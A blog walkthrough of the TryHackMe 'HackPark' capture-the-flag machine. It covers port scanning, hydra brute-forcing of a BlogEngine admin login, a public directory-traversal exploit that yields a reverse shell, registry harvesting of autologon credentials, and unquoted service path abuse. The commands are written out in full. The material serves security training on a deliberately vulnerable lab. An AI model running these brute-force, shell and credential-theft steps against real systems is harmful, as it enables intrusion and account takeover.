You dont have javascript enabled! Please enable it!

HackPark – TryHackMe – Manual Writeup

Reading Time: ( Word Count: )

February 21, 2021


This machine will cover brute-forcing account credentials & handling public exploits. Here’s a link to the box.



Nmap scan

As usual, we’ll start with a Nmap scan.

  ┌──(kali㉿kali)-[~]      └─$ export IP=   ┌──(kali㉿kali)-[~]      └─$ nmap -A -p- -v -Pn $IP
PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 8.5 | http-methods: | Supported Methods: GET HEAD OPTIONS TRACE POST |_ Potentially risky methods: TRACE | http-robots.txt: 6 disallowed entries | /Account/*.* /search /search.aspx /error404.aspx |_/archive /archive.aspx |_http-server-header: Microsoft-IIS/8.5 |_http-title: hackpark | hackpark amusements 3389/tcp open ssl/ms-wbt-server? | ssl-cert: Subject: commonName=hackpark | Issuer: commonName=hackpark | Public Key type: rsa | Public Key bits: 2048 | Signature Algorithm: sha1WithRSAEncryption | Not valid before: 2020-10-01T21:12:23 | Not valid after: 2021-04-02T21:12:23 | MD5: 3032 2fb5 4e45 55fa e4d8 a136 f99f 86d3 |_SHA-1: e191 17b5 7329 905e 23e3 93ca d5b1 fbac a510 663b |_ssl-date: 2021-02-09T08:23:14+00:00; -1s from scanner time. Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

We have an open Microsoft web server & an RDP port. While inspecting the website, let’s brute-force for other interesting directories in the background.


Gobuster directory brute-forcing

  ┌──(kali㉿kali)-[~]      └─$ gobuster dir -u $IP/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt -e -r
=============================================================== Gobuster v3.0.1 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_) =============================================================== [+] Url: [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt [+] Status codes: 200,204,301,302,307,401,403 [+] User Agent: gobuster/3.0.1 [+] Follow Redir: true [+] Expanded: true [+] Timeout: 10s =============================================================== 2021/02/09 11:14:40 Starting gobuster =============================================================== (Status: 200) (Status: 200) (Status: 200) (Status: 200) (Status: 403) (Status: 200) (Status: 200) (Status: 200) (Status: 200)

With the results from gobuster, we find the admin login page. Checking out its request type by inspecting the form element shows us POST requests that send data to the webserver.

We also found the username to be admin, shown in the URL of the login form. Now that we know the request type and have a URL for the login form, we can start brute-forcing the account.



Hydra account brute-forcing

1. Go to the website’s login page and try to login with random credentials.
2. Press “F12” or open “Toggle Tools” in Firefox.
3. Select the “Network” tab.
4. Make an attempt to login with random credentials.
5. Find & select the “POST” request under the “Method” column.
6. Copy the URL starting from “/Account/login” and paste it somewhere to build your command:

7. On the right tab, press on “Request“, scroll all the way down and copy the contents of “Request payload“, and append to the previous link separated by a colon ( : )

8. Replace your typed username & password with ^USER^ & ^PASS^
9. Append “:Login failed” to your command at the end.
10. Result:

┌──(kali㉿kali)-[~]    └─$ hydra -l admin -P /usr/share/wordlists/rockyou.txt -vV $IP http-post-form [space] '/Account/login.aspx?ReturnURL=/admin/:__VIEWSTATE=Ah9VhN0B9RYiuDF6%2BMvlcOfR2OZ%2BcVvkr8LcnJfzMeJe0OsCPo4OMJqfrYasix92wNYHbqm3cgxMec8Z3h%2BBtn71HLVzu495K9ySQE%2BaR5NaEV9vvjt%2FBoz6fXaTTlxQanuQfR%2BZ2DNwqBdqlUfO8vlAE3NKBLb3pMibwwXIuzcifowsfWzKWO15KVeFasS1n6EPMAB33j%2Fc8mcC1xnuzXx4nXB6pMHqc8C7Ka%2FisZdEflgRP%2BG3h8HfycDEoQfd3JXwKSBx6wTeUbSWfJ%2FiRo33Wo6LKwXzIbt%2FVTx8KiWtMV4nKZ2uJ6UcDNcYj6zh5gqaKJYVe7nrldsqKahaN76%2FlEkbKBpHF3aX4%2Bebd9VP4REL&__EVENTVALIDATION=kPO8UUfP8U3ljY712E60qDNGtShCmu43R2e%2B0HQtYgVX%2B5p8S6py0jOleecXbbrYF6%2BysanDe3AFCGrRdbjRSrETb2AzXWJW%2BOzx5muLNpEaphKyLRO%2FIuplxczYtgZDHQ14RpBckwusfOI4Bg%2F4h5AjHQ769OAAq1pJvXMoY%2FrkZlbc&ctl00%24MainContent%24LoginUser%24UserName=^USER^&ctl00%24MainContent%24LoginUser%24Password=^PASS^&ctl00%24MainContent%24LoginUser%24LoginButton=Log+in:Login failed'

This string has three parts divided by colons:
path to the login form page : request body : error message indicating failure



After logging in as admin, we find the BlogEngine version to be & search for an exploit:

  ┌──(kali㉿kali)-[~]      └─$ searchsploit blogengine 3 ---------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------- --------------------------------- BlogEngine 3.3 - 'syndication.axd' XML External Entity Injection | xml/webapps/48422.txt BlogEngine 3.3 - XML External Entity Injection | windows/webapps/46106.txt BlogEngine 3.3.8 - 'Content' Stored XSS | aspx/webapps/48999.txt BlogEngine.NET 1.4 - 'search.aspx' Cross-Site Scripting | asp/webapps/32874.txt BlogEngine.NET 1.6 - Directory Traversal / Information Disclosure | asp/webapps/35168.txt BlogEngine.NET 3.3.6 - Directory Traversal / Remote Code Execution | aspx/webapps/46353.cs BlogEngine.NET 3.3.6/3.3.7 - 'dirPath' Directory Traversal / Remote Code Executio | aspx/webapps/ BlogEngine.NET 3.3.6/3.3.7 - 'path' Directory Traversal | aspx/webapps/ BlogEngine.NET 3.3.6/3.3.7 - 'theme Cookie' Directory Traversal / Remote Code Exe | aspx/webapps/ BlogEngine.NET 3.3.6/3.3.7 - XML External Entity Injection | aspx/webapps/ ---------------------------------------------------------------------------------- --------------------------------- Shellcodes: No Results

Copy the exploit locally, change the IP & port & start listening to the choosen port.

  ┌──(kali㉿kali)-[~]      └─$ cp /usr/share/exploitdb/exploits/aspx/webapps/46353.cs ./PostView.ascx   ┌──(kali㉿kali)-[~]      └─$ gedit PostView.ascx   ┌──(kali㉿kali)-[~]      └─$ sudo nc -nlvp 443

According to the exploit description, we need to do the following:
1. Navigate to Content
2. Posts
3. New
4. Upload Exploit (name must be PostView.ascx)
5. Publish
6. Visit http://TARGET_IP/?theme=../../App_Data/files to get a shell

listening on [any] 443 ... connect to [x.x.x.x] from (UNKNOWN) [] 50120 Microsoft Windows [Version 6.3.9600] (c) 2013 Microsoft Corporation. All rights reserved. c:\windows\system32\inetsrv> whoami c:\windows\system32\inetsrv>whoami iis apppool\blog



Privilege Escalation

Systeminfo to get an overview

Let’s see the machine’s specs:

> systeminfo
c:\windows\system32\inetsrv>systeminfo Host Name: HACKPARK OS Name: Microsoft Windows Server 2012 R2 Standard OS Version: 6.3.9600 N/A Build 9600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Server OS Build Type: Multiprocessor Free Registered Owner: Windows User Registered Organization: Product ID: 00252-70000-00000-AA886 Original Install Date: 8/3/2019, 10:43:23 AM System Boot Time: 2/9/2021, 3:19:24 AM System Manufacturer: Xen System Model: HVM domU System Type: x64-based PC ...



Whoami privileges check

> whoami /priv
c:\windows\system32\inetsrv>systeminfo PRIVILEGES INFORMATION ---------------------- Privilege Name Description State ============================= ========================================= ======== SeAssignPrimaryTokenPrivilege Replace a process level token Disabled SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled SeAuditPrivilege Generate security audits Disabled SeChangeNotifyPrivilege Bypass traverse checking Enabled SeImpersonatePrivilege Impersonate a client after authentication Enabled SeCreateGlobalPrivilege Create global objects Enabled SeIncreaseWorkingSetPrivilege Increase a process working set Disabled

Windows uses tokens to ensure that accounts have the right privileges to carry out particular actions. Account tokens are assigned to an account when users log in or are authenticated.


There are two types of access tokens:

  • primary access tokens: those associated with a user account that are generated on log on
  • impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process.

We could use token impersonation to gain system access.

Winlogon credentials

Let’s check the registry for User Autologon / Winlogon credentials:

> reg query "HKLM\Software\Microsoft\Windows NT\CurrentVersion\winlogon"
... LastUsedUsername REG_SZ administrator AutoAdminLogon REG_DWORD 0x1 DefaultUserName REG_SZ administrator DefaultPassword REG_SZ 4q6[redacted]Fdxs

It looks like we found some admin credentials; let’s use the open RDP port to connect to the machine.

> xfreerdp /dynamic-resolution +clipboard /cert:ignore /v:$IP /u:administrator /p:'4q6X[redacted]dxs'

We’ve unusually retrieved the flag. Let us continue with the normal path to exploit another weakness this box has.


Unquoted Service Paths

Let’s search for unquoted service paths:

> wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
AWS Lite Guest Agent AWSLiteAgent C:\Program Files\Amazon\XenTools\LiteAgent.exe Auto System Scheduler Service WindowsScheduler C:\PROGRA~2\SYSTEM~1\WService.exe Auto

Let’s query the service name for more info.

> sc qc WindowsScheduler

Check out the log files for the right binary name that’s being run automatically. In the system scheduler map, you can replace the message.exe with a generated shell exec to get an admin shell as an alternative.

author bio

Author bio

Hi there, my name is Aydan, and I share exciting information about cyber security and ethical hacking, a.k.a pen-testing.

Other interesting articles

Winter Vivern: “The Latest Cyber Threat Targeting European Governments”

Winter Vivern: “The Latest Cyber Threat Targeting European Governments”

Winter Vivern, an advanced persistent threat (APT) actor, has expanded its cyber espionage campaign by targeting ...
“MacStealer Malware Strikes: iCloud Keychain Data and Passwords at Risk for Apple Users”

“MacStealer Malware Strikes: iCloud Keychain Data and Passwords at Risk for Apple Users”

A new type of macOS malware called MacStealer has been discovered, capable of stealing iCloud Keychain data and ...
Cybersecurity Automation: Empowering Your Cyber Defense

Cybersecurity Automation: Empowering Your Cyber Defense

In today's digital age, cybersecurity is a top priority for organizations of all sizes and industries. As cyber ...
Will Cybersecurity Be Automated?

Will Cybersecurity Be Automated?

In recent years, there has been a growing trend toward automation in many industries, including cybersecurity. The ...

Submit a Comment

Your email address will not be published. Required fields are marked *

error: Alert: Content is protected !!